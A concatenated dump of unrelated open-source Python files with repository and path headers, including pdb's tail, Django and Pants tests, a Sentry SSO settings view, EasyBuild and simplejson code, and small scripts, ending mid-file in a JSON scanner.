except KeyboardInterrupt:
pass
def print_stack_entry(self, frame_lineno, prompt_prefix=line_prefix):
frame, lineno = frame_lineno
if frame is self.curframe:
prefix = '> '
else:
prefix = ' '
self.message(prefix +
self.format_stack_entry(frame_lineno, prompt_prefix))
# Provide help
def do_help(self, arg):
"""h(elp)
Without argument, print the list of available commands.
With a command name as argument, print help about that command.
"help pdb" shows the full pdb documentation.
"help exec" gives help on the ! command.
"""
if not arg:
return cmd.Cmd.do_help(self, arg)
try:
try:
topic = getattr(self, 'help_' + arg)
return topic()
except AttributeError:
command = getattr(self, 'do_' + arg)
except AttributeError:
self.error('No help for %r' % arg)
else:
if sys.flags.optimize >= 2:
self.error('No help for %r; please do not run Python with -OO '
'if you need command help' % arg)
return
self.message(command.__doc__.rstrip())
do_h = do_help
def help_exec(self):
"""(!) statement
Execute the (one-line) statement in the context of the current
stack frame. The exclamation point can be omitted unless the
first word of the statement resembles a debugger command. To
assign to a global variable you must always prefix the command
with a 'global' command, e.g.:
(Pdb) global list_options; list_options = ['-l']
(Pdb)
"""
self.message((self.help_exec.__doc__ or '').strip())
def help_pdb(self):
help()
# other helper functions
def lookupmodule(self, filename):
"""Helper function for break/clear parsing -- may be overridden.
lookupmodule() translates (possibly incomplete) file or module name
into an absolute file name.
"""
if os.path.isabs(filename) and os.path.exists(filename):
return filename
f = os.path.join(sys.path[0], filename)
if os.path.exists(f) and self.canonic(f) == self.mainpyfile:
return f
root, ext = os.path.splitext(filename)
if ext == '':
filename = filename + '.py'
if os.path.isabs(filename):
return filename
for dirname in sys.path:
while os.path.islink(dirname):
dirname = os.readlink(dirname)
fullname = os.path.join(dirname, filename)
if os.path.exists(fullname):
return fullname
return None
def _runscript(self, filename):
# The script has to run in __main__ namespace (or imports from
# __main__ will break).
#
# So we clear up the __main__ and set several special variables
# (this gets rid of pdb's globals and cleans old variables on restarts).
import __main__
__main__.__dict__.clear()
__main__.__dict__.update({"__name__" : "__main__",
"__file__" : filename,
"__builtins__": __builtins__,
})
# When bdb sets tracing, a number of call and line events happens
# BEFORE debugger even reaches user's code (and the exact sequence of
# events depends on python version). So we take special measures to
# avoid stopping before we reach the main script (see user_line and
# user_call for details).
self._wait_for_mainpyfile = True
self.mainpyfile = self.canonic(filename)
self._user_requested_quit = False
with open(filename, "rb") as fp:
statement = "exec(compile(%r, %r, 'exec'))" % \
(fp.read(), self.mainpyfile)
self.run(statement)
# Collect all command help into docstring, if not run with -OO
if __doc__ is not None:
# unfortunately we can't guess this order from the class definition
_help_order = [
'help', 'where', 'down', 'up', 'break', 'tbreak', 'clear', 'disable',
'enable', 'ignore', 'condition', 'commands', 'step', 'next', 'until',
'jump', 'return', 'retval', 'run', 'continue', 'list', 'longlist',
'args', 'print', 'pp', 'whatis', 'source', 'display', 'undisplay',
'interact', 'alias', 'unalias', 'debug', 'quit',
]
for _command in _help_order:
__doc__ += getattr(Pdb, 'do_' + _command).__doc__.strip() + '\n\n'
__doc__ += Pdb.help_exec.__doc__
del _help_order, _command
# Simplified interface
def run(statement, globals=None, locals=None):
Pdb().run(statement, globals, locals)
def runeval(expression, globals=None, locals=None):
return Pdb().runeval(expression, globals, locals)
def runctx(statement, globals, locals):
# B/W compatibility
run(statement, globals, locals)
def runcall(*args, **kwds):
return Pdb().runcall(*args, **kwds)
def set_trace():
Pdb().set_trace(sys._getframe().f_back)
# Post-Mortem interface
def post_mortem(t=None):
# handling the default
if t is None:
# sys.exc_info() returns (type, value, traceback) if an exception is
# being handled, otherwise it returns None
t = sys.exc_info()[2]
if t is None:
raise ValueError("A valid traceback must be passed if no "
"exception is being handled")
p = Pdb()
p.reset()
p.interaction(None, t)
def pm():
post_mortem(sys.last_traceback)
# Main program for testing
TESTCMD = 'import x; x.main()'
def test():
run(TESTCMD)
# print help
def help():
import pydoc
pydoc.pager(__doc__)
_usage = """\
usage: pdb.py [-c command] ... pyfile [arg] ...
Debug the Python program given by pyfile.
Initial commands are read from .pdbrc files in your home directory
and in the current directory, if they exist. Commands supplied with
-c are executed after commands from .pdbrc files.
To let the script run until an exception occurs, use "-c continue".
To let the script run up to a given line X in the debugged file, use
"-c 'until X'"."""
def main():
import getopt
opts, args = getopt.getopt(sys.argv[1:], 'hc:', ['--help', '--command='])
if not args:
print(_usage)
sys.exit(2)
commands = []
for opt, optarg in opts:
if opt in ['-h', '--help']:
print(_usage)
sys.exit()
elif opt in ['-c', '--command']:
commands.append(optarg)
mainpyfile = args[0] # Get script filename
if not os.path.exists(mainpyfile):
print('Error:', mainpyfile, 'does not exist')
sys.exit(1)
sys.argv[:] = args # Hide "pdb.py" and pdb options from argument list
# Replace pdb's dir with script's dir in front of module search path.
sys.path[0] = os.path.dirname(mainpyfile)
# Note on saving/restoring sys.argv: it's a good idea when sys.argv was
# modified by the script being debugged. It's a bad idea when it was
# changed by the user from the command line. There is a "restart" command
# which allows explicit specification of command line arguments.
pdb = Pdb()
pdb.rcLines.extend(commands)
while True:
try:
pdb._runscript(mainpyfile)
if pdb._user_requested_quit:
break
print("The program finished and will be restarted")
except Restart:
print("Restarting", mainpyfile, "with arguments:")
print("\t" + " ".join(args))
except SystemExit:
# In most cases SystemExit does not warrant a post-mortem session.
print("The program exited via sys.exit(). Exit status:", end=' ')
print(sys.exc_info()[1])
except:
traceback.print_exc()
print("Uncaught exception. Entering post mortem debugging")
print("Running 'cont' or 'step' will restart the program")
t = sys.exc_info()[2]
pdb.interaction(None, t)
print("Post mortem debugger finished. The " + mainpyfile +
" will be restarted")
# When invoked as main program, invoke the debugger on a script
if __name__ == '__main__':
import pdb
pdb.main()
|
baroquebobcat/pants
|
refs/heads/master
|
tests/python/pants_test/backend/codegen/protobuf/java/test_protobuf_gen.py
|
1
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from textwrap import dedent
from twitter.common.collections import OrderedSet
from pants.backend.codegen.protobuf.java.protobuf_gen import ProtobufGen
from pants.backend.codegen.protobuf.java.register import build_file_aliases as register_codegen
from pants.backend.jvm.register import build_file_aliases as register_jvm
from pants.build_graph.register import build_file_aliases as register_core
from pants_test.task_test_base import TaskTestBase
class ProtobufGenTest(TaskTestBase):
def setUp(self):
super(ProtobufGenTest, self).setUp()
self.set_options(pants_bootstrapdir='~/.cache/pants',
max_subprocess_args=100,
binaries_fetch_timeout_secs=1,
binaries_baseurls=['http://example.com/dummy_base_url'])
@classmethod
def task_type(cls):
return ProtobufGen
@classmethod
def alias_groups(cls):
return register_core().merge(register_jvm()).merge(register_codegen())
def test_default_javadeps(self):
self.create_file(relpath='test_proto/test.proto', contents=dedent("""
package com.example.test_proto;
enum Foo { foo=1;}
message Bar {}
"""))
self.add_to_build_file('test_proto', dedent("""
java_protobuf_library(name='proto',
sources=['test.proto'],
dependencies=[]
)
"""))
self.add_to_build_file('3rdparty', dedent("""
target(name='protobuf-java')
"""))
context = self.context(target_roots=[self.target('test_proto:proto')])
task = self.create_task(context)
javadeps = task.javadeps
self.assertEquals(len(javadeps), 1)
self.assertEquals('protobuf-java', javadeps.pop().name)
def test_calculate_sources(self):
self.create_file(relpath='proto-lib/foo.proto', contents='')
self.add_to_build_file('proto-lib', dedent("""
java_protobuf_library(name='proto-target',
sources=['foo.proto'],
)
"""))
target = self.target('proto-lib:proto-target')
context = self.context(target_roots=[target])
task = self.create_task(context)
result = task._calculate_sources(target)
self.assertEquals(1, len(result.keys()))
self.assertEquals(OrderedSet(['proto-lib/foo.proto']), result['proto-lib'])
def test_calculate_sources_with_source_root(self):
self.create_file(relpath='project/src/main/proto/proto-lib/foo.proto', contents='')
self.add_to_build_file('project/src/main/proto/proto-lib', dedent("""
java_protobuf_library(name='proto-target',
sources=['foo.proto'],
)
"""))
target = self.target('project/src/main/proto/proto-lib:proto-target')
context = self.context(target_roots=[target])
task = self.create_task(context)
result = task._calculate_sources(target)
self.assertEquals(1, len(result.keys()))
self.assertEquals(OrderedSet(['project/src/main/proto/proto-lib/foo.proto']),
result['project/src/main/proto'])
|
Kolguyev/samples
|
refs/heads/master
|
vaxel_beraknare/VaxelRaknare_v2.py
|
1
|
class ValorRaknare(object):
''' Beraknar antalet av en viss valor,
givet ett belopp.
'''
def __init__(self, valor):
self.valor = valor
def AntalOchAterstaende(self, belopp):
''' Raknar antalet av en valor '''
aterstaende = belopp%self.valor
antal = belopp/self.valor
return antal, aterstaende
class VaxelRaknare(object):
''' Beraknar antalet av varje valor, givet
ett belopp.
'''
def __init__(self, valorer):
self.valorer = valorer
def ValorAntal(self, aterstaende):
''' Raknar antalet av vardera valor och sparar
resultat som dictionary.
'''
valorAntal = dict()
for valor in self.valorer:
antal, aterstaende = ValorRaknare(valor).AntalOchAterstaende(aterstaende)
if not antal:
continue
valorAntal[valor] = antal
return valorAntal, aterstaende
def VisaAntal(self, belopp):
valorAntal, aterstaende = self.ValorAntal(belopp)
print 'Beloppet %.1f har foljande valorer:' % belopp
for valor in self.valorer:
antal = valorAntal.get(valor)
if not antal:
continue
print '{0:10}{1:10}'.format(str(valor), str(antal) + " st")
print '(Aterstaende belopp: %.1f)' % aterstaende
vaxelRaknareSEK = VaxelRaknare([1000, 500, 100, 50, 20, 10, 5, 1])
vaxelRaknareSEK.VisaAntal(1997)
vaxelRaknareSEK.VisaAntal(43)
|
intgr/django
|
refs/heads/master
|
tests/template_tests/filter_tests/test_unordered_list.py
|
7
|
from django.template.defaultfilters import unordered_list
from django.test import SimpleTestCase
from django.utils.safestring import mark_safe
from ..utils import setup
class UnorderedListTests(SimpleTestCase):
@setup({'unordered_list01': '{{ a|unordered_list }}'})
def test_unordered_list01(self):
output = self.engine.render_to_string('unordered_list01', {'a': ['x>', ['<y']]})
self.assertEqual(output, '\t<li>x>\n\t<ul>\n\t\t<li><y</li>\n\t</ul>\n\t</li>')
@setup({'unordered_list02': '{% autoescape off %}{{ a|unordered_list }}{% endautoescape %}'})
def test_unordered_list02(self):
output = self.engine.render_to_string('unordered_list02', {'a': ['x>', ['<y']]})
self.assertEqual(output, '\t<li>x>\n\t<ul>\n\t\t<li><y</li>\n\t</ul>\n\t</li>')
@setup({'unordered_list03': '{{ a|unordered_list }}'})
def test_unordered_list03(self):
output = self.engine.render_to_string('unordered_list03', {'a': ['x>', [mark_safe('<y')]]})
self.assertEqual(output, '\t<li>x>\n\t<ul>\n\t\t<li><y</li>\n\t</ul>\n\t</li>')
@setup({'unordered_list04': '{% autoescape off %}{{ a|unordered_list }}{% endautoescape %}'})
def test_unordered_list04(self):
output = self.engine.render_to_string('unordered_list04', {'a': ['x>', [mark_safe('<y')]]})
self.assertEqual(output, '\t<li>x>\n\t<ul>\n\t\t<li><y</li>\n\t</ul>\n\t</li>')
@setup({'unordered_list05': '{% autoescape off %}{{ a|unordered_list }}{% endautoescape %}'})
def test_unordered_list05(self):
output = self.engine.render_to_string('unordered_list05', {'a': ['x>', ['<y']]})
self.assertEqual(output, '\t<li>x>\n\t<ul>\n\t\t<li><y</li>\n\t</ul>\n\t</li>')
class FunctionTests(SimpleTestCase):
def test_list(self):
self.assertEqual(unordered_list(['item 1', 'item 2']), '\t<li>item 1</li>\n\t<li>item 2</li>')
def test_nested(self):
self.assertEqual(
unordered_list(['item 1', ['item 1.1']]),
'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1</li>\n\t</ul>\n\t</li>',
)
def test_nested2(self):
self.assertEqual(
unordered_list(['item 1', ['item 1.1', 'item1.2'], 'item 2']),
'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1</li>\n\t\t<li>item1.2'
'</li>\n\t</ul>\n\t</li>\n\t<li>item 2</li>',
)
def test_nested3(self):
self.assertEqual(
unordered_list(['item 1', 'item 2', ['item 2.1']]),
'\t<li>item 1</li>\n\t<li>item 2\n\t<ul>\n\t\t<li>item 2.1'
'</li>\n\t</ul>\n\t</li>',
)
def test_nested_multiple(self):
self.assertEqual(
unordered_list(['item 1', ['item 1.1', ['item 1.1.1', ['item 1.1.1.1']]]]),
'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1\n\t\t<ul>\n\t\t\t<li>'
'item 1.1.1\n\t\t\t<ul>\n\t\t\t\t<li>item 1.1.1.1</li>\n\t\t\t'
'</ul>\n\t\t\t</li>\n\t\t</ul>\n\t\t</li>\n\t</ul>\n\t</li>',
)
def test_nested_multiple2(self):
self.assertEqual(
unordered_list(['States', ['Kansas', ['Lawrence', 'Topeka'], 'Illinois']]),
'\t<li>States\n\t<ul>\n\t\t<li>Kansas\n\t\t<ul>\n\t\t\t<li>'
'Lawrence</li>\n\t\t\t<li>Topeka</li>\n\t\t</ul>\n\t\t</li>'
'\n\t\t<li>Illinois</li>\n\t</ul>\n\t</li>',
)
def test_autoescape(self):
self.assertEqual(
unordered_list(['<a>item 1</a>', 'item 2']),
'\t<li><a>item 1</a></li>\n\t<li>item 2</li>',
)
def test_autoescape_off(self):
self.assertEqual(
unordered_list(['<a>item 1</a>', 'item 2'], autoescape=False),
'\t<li><a>item 1</a></li>\n\t<li>item 2</li>',
)
def test_ulitem(self):
class ULItem:
def __init__(self, title):
self.title = title
def __str__(self):
return 'ulitem-%s' % str(self.title)
a = ULItem('a')
b = ULItem('b')
c = ULItem('<a>c</a>')
self.assertEqual(
unordered_list([a, b, c]),
'\t<li>ulitem-a</li>\n\t<li>ulitem-b</li>\n\t<li>ulitem-<a>c</a></li>',
)
def item_generator():
yield a
yield b
yield c
self.assertEqual(
unordered_list(item_generator()),
'\t<li>ulitem-a</li>\n\t<li>ulitem-b</li>\n\t<li>ulitem-<a>c</a></li>',
)
def test_ulitem_autoescape_off(self):
class ULItem:
def __init__(self, title):
self.title = title
def __str__(self):
return 'ulitem-%s' % str(self.title)
a = ULItem('a')
b = ULItem('b')
c = ULItem('<a>c</a>')
self.assertEqual(
unordered_list([a, b, c], autoescape=False),
'\t<li>ulitem-a</li>\n\t<li>ulitem-b</li>\n\t<li>ulitem-<a>c</a></li>',
)
def item_generator():
yield a
yield b
yield c
self.assertEqual(
unordered_list(item_generator(), autoescape=False),
'\t<li>ulitem-a</li>\n\t<li>ulitem-b</li>\n\t<li>ulitem-<a>c</a></li>',
)
|
ddico/odoomrp-utils
|
refs/heads/8.0
|
account_invoice_supplier_ref_required/__init__.py
|
44
|
# -*- encoding: utf-8 -*-
##############################################################################
# For copyright and license notices, see __openerp__.py file in root directory
##############################################################################
|
jokey2k/sentry
|
refs/heads/master
|
src/sentry/web/frontend/organization_auth_settings.py
|
1
|
from __future__ import absolute_import
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.db import transaction
from django.db.models import F
from django.http import HttpResponse, HttpResponseRedirect
from django.utils.translation import ugettext_lazy as _
from sentry import features
from sentry.auth import manager
from sentry.auth.helper import AuthHelper
from sentry.models import (
AuditLogEntry, AuditLogEntryEvent, AuthProvider, OrganizationMember,
OrganizationMemberType
)
from sentry.plugins import Response
from sentry.utils import db
from sentry.utils.http import absolute_uri
from sentry.web.frontend.base import OrganizationView
ERR_NO_SSO = _('The SSO feature is not enabled for this organization.')
OK_PROVIDER_DISABLED = _('SSO authentication has been disabled.')
OK_REMINDERS_SENT = _('A reminder email has been sent to members who have not yet linked their accounts.')
class OrganizationAuthSettingsView(OrganizationView):
required_access = OrganizationMemberType.OWNER
def _disable_provider(self, request, organization, auth_provider):
AuditLogEntry.objects.create(
organization=organization,
actor=request.user,
ip_address=request.META['REMOTE_ADDR'],
target_object=auth_provider.id,
event=AuditLogEntryEvent.SSO_DISABLE,
data=auth_provider.get_audit_log_data(),
)
if db.is_sqlite():
for om in OrganizationMember.objects.filter(organization=organization):
setattr(om.flags, 'sso:linked', False)
setattr(om.flags, 'sso:invalid', False)
om.save()
else:
OrganizationMember.objects.filter(
organization=organization,
).update(
flags=F('flags').bitand(
~getattr(OrganizationMember.flags, 'sso:linked'),
).bitand(
~getattr(OrganizationMember.flags, 'sso:invalid'),
),
)
auth_provider.delete()
def _reinvite_members(self, request, organization):
member_list = OrganizationMember.objects.filter(
organization=organization,
flags=~getattr(OrganizationMember.flags, 'sso:linked'),
)
for member in member_list:
member.send_sso_link_email()
def handle_existing_provider(self, request, organization, auth_provider):
provider = auth_provider.get_provider()
if request.method == 'POST':
op = request.POST.get('op')
if op == 'disable':
self._disable_provider(request, organization, auth_provider)
messages.add_message(
request, messages.SUCCESS,
OK_PROVIDER_DISABLED,
)
next_uri = reverse('sentry-organization-auth-settings',
args=[organization.slug])
return self.redirect(next_uri)
elif op == 'reinvite':
self._reinvite_members(request, organization)
messages.add_message(
request, messages.SUCCESS,
OK_REMINDERS_SENT,
)
next_uri = reverse('sentry-organization-auth-settings',
args=[organization.slug])
return self.redirect(next_uri)
view = provider.get_configure_view()
response = view(request, organization, auth_provider)
if isinstance(response, HttpResponse):
return response
elif isinstance(response, Response):
response = response.render(request, {
'auth_provider': auth_provider,
'organization': organization,
'provider': provider,
})
pending_links_count = OrganizationMember.objects.filter(
organization=organization,
flags=~getattr(OrganizationMember.flags, 'sso:linked'),
).count()
context = {
'pending_links_count': pending_links_count,
'login_url': absolute_uri(reverse('sentry-organization-home', args=[organization.slug])),
'auth_provider': auth_provider,
'provider_name': provider.name,
'content': response,
}
return self.respond('sentry/organization-auth-provider-settings.html', context)
def handle_provider_setup(self, request, organization, provider_key):
helper = AuthHelper(
request=request,
organization=organization,
provider_key=provider_key,
flow=AuthHelper.FLOW_SETUP_PROVIDER,
)
helper.init_pipeline()
return helper.next_step()
@transaction.atomic
def handle(self, request, organization):
if not features.has('organizations:sso', organization, actor=request.user):
messages.add_message(
request, messages.ERROR,
ERR_NO_SSO,
)
return HttpResponseRedirect(reverse('sentry-organization-home', args=[organization.slug]))
try:
auth_provider = AuthProvider.objects.get(
organization=organization,
)
except AuthProvider.DoesNotExist:
pass
else:
return self.handle_existing_provider(
request=request,
organization=organization,
auth_provider=auth_provider,
)
if request.method == 'POST':
provider_key = request.POST.get('provider')
if not manager.exists(provider_key):
raise ValueError('Provider not found: {}'.format(provider_key))
# render first time setup view
return self.handle_provider_setup(request, organization, provider_key)
context = {
'provider_list': [(k, v.name) for k, v in manager],
}
return self.respond('sentry/organization-auth-settings.html', context)
|
pescobar/easybuild-framework
|
refs/heads/master
|
easybuild/toolchains/pmkl.py
|
2
|
##
# Copyright 2012-2020 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for pmkl compiler toolchain (includes PGI,
Intel Math Kernel Library (MKL), and Intel FFTW wrappers).
:author: Stijn De Weirdt (Ghent University)
:author: Kenneth Hoste (Ghent University)
:author: Bart Oldeman (McGill University, Calcul Quebec, Compute Canada)
"""
from easybuild.toolchains.pgi import PgiToolchain
from easybuild.toolchains.fft.intelfftw import IntelFFTW
from easybuild.toolchains.linalg.intelmkl import IntelMKL
class Pmkl(PgiToolchain, IntelMKL, IntelFFTW):
"""
Compiler toolchain with PGI, Intel Math Kernel Library (MKL)
and Intel FFTW wrappers.
"""
NAME = 'pmkl'
SUBTOOLCHAIN = PgiToolchain.NAME
OPTIONAL = True
|
ernestoalarcon/competitiveprogramming
|
refs/heads/master
|
quicksort1.py
|
1
|
#!/bin/python
def partition(ar):
left = []
right = []
equal = []
if len(ar) > 0:
pivot = ar[0]
for x in ar:
if x < pivot:
left.append(x)
elif x > pivot:
right.append(x)
else:
equal.append(x)
return left + equal + right
m = input()
ar = [int(i) for i in raw_input().strip().split()]
result = partition(ar)
print ' '.join(str(v) for v in result)
|
anupcshan/bazel
|
refs/heads/master
|
third_party/py/gflags/tests/gflags_googletest.py
|
132
|
#!/usr/bin/env python
# Copyright (c) 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Some simple additions to the unittest framework useful for gflags testing."""
import re
import unittest
def Sorted(lst):
"""Equivalent of sorted(), but not dependent on python version."""
sorted_list = lst[:]
sorted_list.sort()
return sorted_list
def MultiLineEqual(expected, actual):
"""Returns True if expected == actual, or returns False and logs."""
if actual == expected:
return True
print "Error: FLAGS.MainModuleHelp() didn't return the expected result."
print "Got:"
print actual
print "[End of got]"
actual_lines = actual.split("\n")
expected_lines = expected.split("\n")
num_actual_lines = len(actual_lines)
num_expected_lines = len(expected_lines)
if num_actual_lines != num_expected_lines:
print "Number of actual lines = %d, expected %d" % (
num_actual_lines, num_expected_lines)
num_to_match = min(num_actual_lines, num_expected_lines)
for i in range(num_to_match):
if actual_lines[i] != expected_lines[i]:
print "One discrepancy: Got:"
print actual_lines[i]
print "Expected:"
print expected_lines[i]
break
else:
# If we got here, found no discrepancy, print first new line.
if num_actual_lines > num_expected_lines:
print "New help line:"
print actual_lines[num_expected_lines]
elif num_expected_lines > num_actual_lines:
print "Missing expected help line:"
print expected_lines[num_actual_lines]
else:
print "Bug in this test -- discrepancy detected but not found."
return False
class TestCase(unittest.TestCase):
def assertListEqual(self, list1, list2):
"""Asserts that, when sorted, list1 and list2 are identical."""
# This exists in python 2.7, but not previous versions. Use the
# built-in version if possible.
if hasattr(unittest.TestCase, "assertListEqual"):
unittest.TestCase.assertListEqual(self, Sorted(list1), Sorted(list2))
else:
self.assertEqual(Sorted(list1), Sorted(list2))
def assertMultiLineEqual(self, expected, actual):
# This exists in python 2.7, but not previous versions. Use the
# built-in version if possible.
if hasattr(unittest.TestCase, "assertMultiLineEqual"):
unittest.TestCase.assertMultiLineEqual(self, expected, actual)
else:
self.assertTrue(MultiLineEqual(expected, actual))
def assertRaisesWithRegexpMatch(self, exception, regexp, fn, *args, **kwargs):
try:
fn(*args, **kwargs)
except exception, why:
self.assertTrue(re.search(regexp, str(why)),
"'%s' does not match '%s'" % (regexp, why))
return
self.fail(exception.__name__ + " not raised")
def main():
unittest.main()
|
chemelnucfin/tensorflow
|
refs/heads/master
|
tensorflow/python/platform/logging_test.py
|
210
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
class EventLoaderTest(googletest.TestCase):
def test_log(self):
# Just check that logging works without raising an exception.
logging.error("test log message")
if __name__ == "__main__":
googletest.main()
|
popazerty/try
|
refs/heads/master
|
tools/create_picon_links.py
|
192
|
#
# create links for picon
# usage: create_picon_links lamedb
# run in picon directory.
# It will read the servicenames from the lamedb and create symlinks
# for the servicereference names.
import os, sys
f = open(sys.argv[1]).readlines()
f = f[f.index("services\n")+1:-3]
while len(f):
ref = [int(x, 0x10) for x in f[0][:-1].split(':')]
name = f[1][:-1]
name = name.replace('\xc2\x87', '').replace('\xc2\x86', '')
# SID:NS:TSID:ONID:STYPE:UNUSED(channelnumber in enigma1)
# X X X X D D
# REFTYPE:FLAGS:STYPE:SID:TSID:ONID:NS:PARENT_SID:PARENT_TSID:UNUSED
# D D X X X X X X X X
refstr = "1:0:%X:%X:%X:%X:%X:0:0:0" % (ref[4], ref[0], ref[2], ref[3], ref[1])
refstr = refstr.replace(':', '_')
filename = name + ".png"
linkname = refstr + ".png"
filename = filename.replace('/', '_').replace('\\', '_').replace('&', '_').replace('\'', '').replace('"', '').replace('`', '')
filename = filename.replace('\n', '')
for i in range(len(filename)):
if ord(filename[i]) > 127:
filename = filename[0:i] + '_' + filename[i + 1:]
if os.access(filename, os.F_OK) and not os.access(linkname, os.F_OK):
os.symlink(filename, linkname)
else:
print "could not find %s (%s)" % (filename, name)
f =f[3:]
|
jamesbeebop/CouchPotatoServer
|
refs/heads/master
|
libs/pyutil/test/current/json_tests/test_fail.py
|
106
|
from unittest import TestCase
from pyutil import jsonutil as json
# Fri Dec 30 18:57:26 2005
JSONDOCS = [
# http://json.org/JSON_checker/test/fail1.json
'"A JSON payload should be an object or array, not a string."',
# http://json.org/JSON_checker/test/fail2.json
'["Unclosed array"',
# http://json.org/JSON_checker/test/fail3.json
'{unquoted_key: "keys must be quoted}',
# http://json.org/JSON_checker/test/fail4.json
'["extra comma",]',
# http://json.org/JSON_checker/test/fail5.json
'["double extra comma",,]',
# http://json.org/JSON_checker/test/fail6.json
'[ , "<-- missing value"]',
# http://json.org/JSON_checker/test/fail7.json
'["Comma after the close"],',
# http://json.org/JSON_checker/test/fail8.json
'["Extra close"]]',
# http://json.org/JSON_checker/test/fail9.json
'{"Extra comma": true,}',
# http://json.org/JSON_checker/test/fail10.json
'{"Extra value after close": true} "misplaced quoted value"',
# http://json.org/JSON_checker/test/fail11.json
'{"Illegal expression": 1 + 2}',
# http://json.org/JSON_checker/test/fail12.json
'{"Illegal invocation": alert()}',
# http://json.org/JSON_checker/test/fail13.json
'{"Numbers cannot have leading zeroes": 013}',
# http://json.org/JSON_checker/test/fail14.json
'{"Numbers cannot be hex": 0x14}',
# http://json.org/JSON_checker/test/fail15.json
'["Illegal backslash escape: \\x15"]',
# http://json.org/JSON_checker/test/fail16.json
'["Illegal backslash escape: \\\'"]',
# http://json.org/JSON_checker/test/fail17.json
'["Illegal backslash escape: \\017"]',
# http://json.org/JSON_checker/test/fail18.json
'[[[[[[[[[[[[[[[[[[[["Too deep"]]]]]]]]]]]]]]]]]]]]',
# http://json.org/JSON_checker/test/fail19.json
'{"Missing colon" null}',
# http://json.org/JSON_checker/test/fail20.json
'{"Double colon":: null}',
# http://json.org/JSON_checker/test/fail21.json
'{"Comma instead of colon", null}',
# http://json.org/JSON_checker/test/fail22.json
'["Colon instead of comma": false]',
# http://json.org/JSON_checker/test/fail23.json
'["Bad value", truth]',
# http://json.org/JSON_checker/test/fail24.json
"['single quote']",
# http://code.google.com/p/simplejson/issues/detail?id=3
u'["A\u001FZ control characters in string"]',
]
SKIPS = {
1: "why not have a string payload?",
18: "spec doesn't specify any nesting limitations",
}
class TestFail(TestCase):
def test_failures(self):
for idx, doc in enumerate(JSONDOCS):
idx = idx + 1
if idx in SKIPS:
json.loads(doc)
continue
try:
json.loads(doc)
except ValueError:
pass
else:
self.fail("Expected failure for fail%d.json: %r" % (idx, doc))
|
uannight/reposan
|
refs/heads/master
|
plugin.video.tvalacarta/lib/simplejson/scanner.py
|
928
|
"""JSON token scanner
"""
import re
try:
from simplejson._speedups import make_scanner as c_make_scanner
except ImportError:
c_make_scanner = None
__all__ = ['make_scanner']
NUMBER_RE = re.compile(
r'(-?(?:0|[1-9]\d*))(\.\d+)?([eE][-+]?\d+)?',
(re.VERBOSE | re.MULTILINE | re.DOTALL))
def py_make_scanner(context):
parse_object = context.parse_object
parse_array = context.parse_array
parse_string = context.parse_string
match_number = NUMBER_RE.match
encoding = context.encoding
strict = context.strict
parse_float = context.parse_float
parse_int = context.parse_int
parse_constant = context.parse_constant
object_hook = context.object_hook
def _scan_once(string, idx):
try:
nextchar = string[idx]
except IndexError:
raise StopIteration
if nextchar == '"':
return parse_string(string, idx + 1, encoding, strict)
elif nextchar == '{':
return parse_object((string, idx + 1), encoding, strict, _scan_once, object_hook)
elif nextchar == '[':
return parse_array((string, idx + 1), _scan_once)
elif nextchar == 'n' and string[idx:idx + 4] == 'null':
return None, idx + 4
